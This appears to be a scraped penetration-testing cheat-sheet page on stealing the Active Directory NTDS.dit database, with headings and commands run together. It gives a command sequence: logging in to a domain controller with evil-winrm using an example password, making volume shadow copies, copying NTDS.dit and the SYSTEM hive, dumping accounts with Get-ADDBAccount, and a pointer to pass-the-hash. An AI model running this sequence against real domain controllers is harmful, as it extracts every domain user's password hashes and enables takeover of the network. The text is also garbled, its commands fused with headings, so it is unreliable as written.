copy-ntds.dit
Capturing NTDS.dit
%systemroot%/ntdsConnect to a DC with evil-winRM
evil-winRM evil-winrm -i 10.10.10.1 -u bwilliamson -p 'p@aw@123'Copying NTDS.dit file
vssadmin CREATE SHADOW /For=C:wmic shadowcopy call create Volume='C:\'copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\ntds.dit reg SAVE hklm\system c:\system.saveGet-ADDBAccount -All -DBPath 'c:\ntds.dit' -Bootkey $key ORCopy NTDS.dit file (fast method)
Pass-the-hash attack (if we are unsuccessful to crack hash, use hash to login)
Last updated